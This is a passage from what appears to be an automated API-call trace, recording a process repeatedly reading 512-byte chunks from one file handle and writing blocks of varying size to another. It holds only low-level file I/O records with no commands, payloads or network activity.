lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.123] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x303, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.125] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.131] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.134] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x293, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.137] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.143] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.143] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.145] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.148] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.153] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.154] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.155] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.156] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.156] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.158] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.161] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.162] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.162] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.163] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.163] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.164] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.165] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.165] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.166] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.166] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.167] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.168] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.169] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, 